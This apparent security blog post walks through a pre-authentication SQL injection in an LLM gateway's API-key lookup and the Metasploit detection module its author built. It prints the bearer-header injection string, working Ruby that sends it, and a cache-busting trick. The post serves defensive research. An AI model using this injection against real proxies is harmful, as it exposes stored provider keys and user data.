Technical · 10 min

Writing a Metasploit Module for a Pre-Auth SQLi in an LLM Gateway

How I turned CVE-2026-42208 — a time-based blind SQL injection in LiteLLM's proxy — into a benign, lab-verified Metasploit detection module, and what the Rapid7 review cycle taught me about shipping upstream.


The target nobody’s hardening yet

LiteLLM is one of those tools that quietly ends up in the middle of everything. It’s a proxy that puts a single OpenAI-compatible API in front of a hundred different model providers, and to do that job it holds the keys — the real upstream API keys for OpenAI, Anthropic, Azure, Bedrock, the lot. Teams drop it in so their apps can talk to “a model” without caring which one, and so platform owners can hand out scoped virtual keys instead of the master credentials.

That makes the proxy a concentrated target. Compromise it and you’re not behind one app — you’re behind everyone’s model budget and, depending on how it’s wired, the data flowing through every request. So when CVE-2026-42208 landed — a pre-authentication SQL injection in the LiteLLM proxy, found by Tencent YunDing Security Lab — it was worth understanding properly. I ended up writing a Metasploit detection module for it, which is now PR #21567 against the framework.

This is the build log: the bug, the module, and the review cycle that cut the module to a third of its original size.

CVE-2026-42208: the bug

The flaw lives in API-key verification. When a request arrives, the proxy needs to look up the bearer token to decide what it’s allowed to do. It builds a PostgreSQL query that, simplified, looks like:

WHERE v.token = '<token>'

The <token> is the raw value from the Authorization: Bearer ... header, interpolated straight into the string — no parameterization. That alone would be a textbook SQLi, except for one detail that makes it almost safe: LiteLLM hashes tokens before they hit the query. A normal LiteLLM virtual key starts with sk-, and any token beginning with sk- gets hashed first, so the value in the query is a hex digest with nothing injectable about it.

The bug is the word “almost.” LiteLLM only hashes tokens that begin with sk-. A bearer value that doesn’t start with sk- skips the hashing path and reaches the query verbatim. So:

Authorization: Bearer ' OR <injected predicate>-- x

breaks out of the string literal, ORs in an attacker-controlled predicate, and comments out the trailing quote. And because this is the failure path of key verification, it runs before the request is ever authenticated. Pre-auth SQLi against the component holding everyone’s keys. Affected versions are 1.81.16 through 1.83.6; it’s fixed in 1.83.7.
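
To make the bypass concrete, here is a minimal Ruby sketch of the flawed pattern. It is not LiteLLM's code (the proxy is written in Python): `lookup_value` and `build_where` are hypothetical names, and SHA-256 is an assumed stand-in for whatever digest the proxy applies to sk- tokens.

```ruby
require 'digest'

# Hypothetical stand-in for the proxy's token normalisation: only values
# that start with "sk-" are hashed; everything else passes through verbatim.
def lookup_value(bearer)
  bearer.start_with?('sk-') ? Digest::SHA256.hexdigest(bearer) : bearer
end

# Hypothetical stand-in for the vulnerable query construction: the value is
# interpolated into the SQL string instead of being bound as a parameter.
def build_where(bearer)
  "WHERE v.token = '#{lookup_value(bearer)}'"
end

puts build_where('sk-example')   # a hex digest, nothing injectable
puts build_where("' OR 1=1-- x") # WHERE v.token = '' OR 1=1-- x'
```

The second call shows the whole problem in one line: the attacker's quote closes the literal, the OR branch becomes part of the query, and the comment marker swallows the trailing quote.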

Why a detection module, not an exploit

I write these as detection modules, not weaponized exploits, and that’s a deliberate line. The goal is to let a defender — or me, in a lab — answer one question: is this specific host vulnerable? Not can I dump the database. The module confirms the flaw and reports it. It never reads, modifies, or exfiltrates a single row.

For a blind SQLi the natural way to do that is a time-based check, and it maps cleanly onto Metasploit’s auxiliary scanner conventions: a check method that returns a verdict, a run that reports the vuln, and nothing that crosses into data access. The module is marked CRASH_SAFE with IOC_IN_LOGS as its only side effect — it will show up in the proxy’s logs, because it’s making real (if benign) requests, but it won’t take anything down.

The first version, and the rule it broke

Here’s the part I’m not precious about: my first version worked, and it was wrong in the way that gets you a review.

A time-based blind check is conceptually simple. Send a request whose injected predicate makes the database sleep when a condition is true, and a second request whose predicate never sleeps. If the first is delayed and the second comes back promptly, the database evaluated your SQL — vulnerable. If both are slow, the server’s just slow, and you don’t flag it. That differential is the whole trick: it’s what keeps a laggy-but-patched host from reading as a false positive.
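
The differential can be sketched in a few lines of plain Ruby. This is an illustration of the idea only: `elapsed_seconds` and `differential_verdict` are hypothetical names, the threshold rule is an assumption, and neither reflects how the framework's library decides internally.

```ruby
# Wall-clock seconds spent in the block, measured on the monotonic clock.
def elapsed_seconds
  started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  yield
  Process.clock_gettime(Process::CLOCK_MONOTONIC) - started
end

# Hypothetical decision rule: flag the host only when the sleeping probe is
# delayed by at least `delay` seconds AND the control probe is not.
def differential_verdict(sleep_elapsed, control_elapsed, delay)
  return :vulnerable if sleep_elapsed >= delay && control_elapsed < delay

  :not_confirmed
end

# Stand-in probes; a real check would send the two HTTP requests here.
delay = 0.2
slow = elapsed_seconds { sleep(delay) }
fast = elapsed_seconds { nil }
puts differential_verdict(slow, fast, delay)
```

A host where both probes are slow falls through to `:not_confirmed`, which is the property that keeps a laggy but patched server from being flagged.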

I hand-rolled all of it. A timed_request helper with a monotonic-clock stopwatch. An effective_sleep floor so the sleep never dropped below a sane minimum. A probe method with the differential logic, and a request timeout computed as SqliDelay * 2 + 20. It was a lot of code, and — this is the important bit — it was code that already exists in the framework, written better than mine.

The review: six threads, one root cause

jheysel-r7 from Rapid7 reviewed it and left six comments. Five were about the symptoms:

  • effective_sleep — “Is this method necessary?”
  • timed_request — “Could you please try using Rex::StopWatch.elapsed_time here?”
  • the * 2 + 20 timeout — “Could you explain the significance of [this]?”
  • the probe method — “This method contains a lot of variables that are single characters which makes it difficult to read… Could you also leave a comment explaining the non-intuitive operations like (t_b - t_a) >= n * 0.6?”

That last one stung a little because it was exactly right. n, t_a, t_b, c1, c2… and a magic 0.6 multiplier I’d have to think hard to re-explain a month later. If the reviewer can’t read it, it doesn’t matter that it works.

But the sixth comment was the one that mattered, and it was at the top of the file:

We have the following library that should be able to help with a lot of the heavy lifting in this module wrt. the SQLi: MySQLi::TimeBasedBlind. Could you please update this module to make use of it?

That’s the root cause of the other five. I’d rebuilt a wheel the framework ships. The vulnerable query is PostgreSQL, not MySQL, so I used the Postgres sibling — Msf::Exploit::SQLi::PostgreSQLi::TimeBasedBlind — but the point stands: the mixin already does the timing, the differential, and the scaling, and it does them consistently across every SQLi module in the framework.

The rebuild

Switching to the library let me delete almost everything. The stopwatch, the floor helper, the differential math, the magic 0.6, the doubled-payload timeout — all gone. What’s left is a single method that hands the library a way to send a request, with the injection in the right place:

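def create_litellm_sqli
  # The library calls this block once per probe, passing the predicate to test.
  create_sqli(dbms: PostgreSQLi::TimeBasedBlind) do |payload|
    # Minimal chat-completion body; its contents are irrelevant to the check.
    body = {
      'model' => datastore['MODEL'],
      'messages' => [{ 'role' => 'user', 'content' => 'x' }],
      'max_tokens' => 1
    }.to_json
    send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path),
        'ctype' => 'application/json',
        # Close the string literal, OR in the predicate, comment out the rest.
        # The random tail sits inside the SQL comment and makes each bearer unique.
        'headers' => { 'Authorization' => "Bearer ' OR #{payload}-- #{Rex::Text.rand_text_alphanumeric(8)}" },
        'data' => body
      },
      request_timeout
    )
  end
end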

The library calls this block, passing in the payload — the predicate it wants tested. My job shrank to one thing: get that payload into the query. I break out of the WHERE v.token = '<token>' literal, OR in the predicate, and comment out the rest. The check is now just:

if create_litellm_sqli.test_vulnerable
  Exploit::CheckCode::Vulnerable(...)
else
  Exploit::CheckCode::Safe(...)
end

test_vulnerable is the library’s sleep-on-true-vs-no-sleep-on-false differential — the exact logic I’d hand-written, now battle-tested and read by every reviewer who’s ever touched a SQLi module. Six comments, resolved by one architectural change.

Two non-obvious details I had to keep

The rebuild deleted my code, but it didn’t delete the domain knowledge the bug demands. Two things survived because the library can’t know them:

The random suffix defeats a cache. Look at the rand_text_alphanumeric(8) at the end of the bearer, sitting inside the SQL comment so it’s inert. It’s not for the database — it’s for LiteLLM. The proxy has an in-memory API-key auth cache, and a repeated bearer would be served from cache and never reach the database, which would silently suppress the pg_sleep. Making every bearer unique forces the lookup to the database every time. Without this, the check would intermittently report safe on a vulnerable host.
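
A standalone sketch of the cache-busting idea, runnable without the framework. `unique_bearer` is a hypothetical helper, `SecureRandom` stands in for `Rex::Text.rand_text_alphanumeric`, and `1=1` is a placeholder for whatever predicate the library supplies.

```ruby
require 'securerandom'

# Builds the bearer value for one probe. The random tail sits after the
# `-- ` comment marker, so the database ignores it, while the proxy's
# cache sees a key it has not served before.
def unique_bearer(predicate)
  "' OR #{predicate}-- #{SecureRandom.alphanumeric(8)}"
end

first = unique_bearer('1=1')
second = unique_bearer('1=1')
puts first
puts second
puts "same SQL, different cache key: #{first != second}"
```

Both values carry an identical predicate; only the inert tail differs, which is all the cache needs in order to miss.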

The timeout has to account for rows. pg_sleep is evaluated once per row the query examines, not once per request. On a proxy with a populated token table, a true predicate can multiply the delay several times over, so the request timeout can’t just be SqliDelay + a bit:

def request_timeout
  (datastore['SqliDelay'] * 4 + 20).ceil
end

SqliDelay * 4 gives headroom for a multi-row table; + 20 covers the network round-trip. This is the comment the reviewer asked for on the old * 2 + 20 — except now it’s explaining a number that’s actually defensible.
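
Worked through with numbers, the formula looks like this. The sketch takes the delay as an argument so it runs outside the framework; `worst_case_delay` is a hypothetical helper, and the delay values are examples rather than the module's defaults.

```ruby
# Same formula as the module's request_timeout, with the delay passed in
# instead of read from the datastore.
def request_timeout(sqli_delay)
  (sqli_delay * 4 + 20).ceil
end

# Server-side delay if the sleep fires once per examined row (an
# assumption about the query plan, used here for illustration).
def worst_case_delay(sqli_delay, rows)
  sqli_delay * rows
end

[1, 2.5].each do |delay|
  puts "delay=#{delay}s timeout=#{request_timeout(delay)}s " \
       "4-row sleep=#{worst_case_delay(delay, 4)}s"
end
```

With a 1-second delay the timeout comes out at 24 seconds, and a four-row table sleeps for about 4 seconds, well inside it.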

And one detection caveat that’s genuinely interesting: the injectable predicate lives in a WHERE clause, which PostgreSQL evaluates only against rows that actually exist in the table. If the token table is empty, there is no row to test, the pg_sleep never runs, and a vulnerable proxy reports as safe. Any LiteLLM proxy in real use has issued at least one virtual key, so this isn’t a problem in the field, but a freshly initialized proxy with an empty table can produce a false negative. The module documents this rather than pretending it doesn’t exist.
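
The empty-table effect is easy to reproduce with a toy model. This is a simulation of a row filter in plain Ruby, not SQL and not the proxy's query; `sleeps_triggered` and the row contents are made up for illustration.

```ruby
# Counts how often the injected branch runs while filtering `rows`.
# The lambda stands in for pg_sleep: it "fires" once for each row it is
# evaluated against and then returns true.
def sleeps_triggered(rows)
  sleeps = 0
  injected = lambda do
    sleeps += 1
    true
  end
  # Mirrors WHERE v.token = '' OR <injected predicate>
  rows.select { |row| row[:token] == '' || injected.call }
  sleeps
end

puts sleeps_triggered([])
puts sleeps_triggered([{ token: 'a1' }, { token: 'b2' }, { token: 'c3' }])
```

The first call prints 0 and the second prints 3: no rows means no sleep and therefore no timing signal, while a populated table multiplies the delay.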

Proving it in the lab

The differential is what makes me trust a “Vulnerable” verdict, but I still verified against the real thing. I stood up the official images on both sides of the fix, each DB-backed with one provisioned virtual key:

  • main-v1.83.3-stable: Vulnerable
  • main-v1.83.7-stable: Safe

And I re-ran check and run repeatedly to confirm the result was stable, not a timing fluke. A detection module that flips between runs is worse than no module — it teaches you to distrust it. Stable across invocations, correct on both sides of the patch boundary: that’s the bar.
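
The stability bar can be expressed as a small helper. `stable_verdict` is hypothetical and not part of Metasploit; the block passed to it stands in for one invocation of the module's check.

```ruby
# Runs the supplied check `runs` times and returns the verdict only if
# every run agreed; otherwise reports :unstable.
def stable_verdict(runs)
  verdicts = Array.new(runs) { yield }
  verdicts.uniq.length == 1 ? verdicts.first : :unstable
end

puts stable_verdict(5) { :vulnerable }
```

A result that flips even once comes back as `:unstable`, which is the signal to investigate timing noise before trusting either answer.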

What shipping into a framework teaches you

The lesson wasn’t the SQLi. I understood the bug going in. The lesson was that a good maintainer optimizes for things a working module doesn’t prove: reuse, readability, and false-positive resistance. My hand-rolled probe was correct, and it was still the wrong answer, because correctness isn’t the only axis. Code that re-implements the framework is code the next person has to re-review from scratch; code built on the shared mixin inherits everyone’s prior scrutiny for free.

The reflex I’m taking forward: before writing the clever part, check whether the framework already owns it. Nine times out of ten the heavy lifting — timing, differentials, encoding, session handling — is a mixin away, and the actual contribution is the thin, domain-specific layer on top. For this module that layer was three things the library couldn’t know: where the injection point is, that the auth cache needs busting, and that empty tables lie.

This is also the first of a pair. The companion post covers the LLM red-teaming side — the garak probes for OS-command and NoSQL injection — where the target isn’t the gateway but the model behind it. Different layer of the AI stack, same discipline: confirm, don’t compromise.
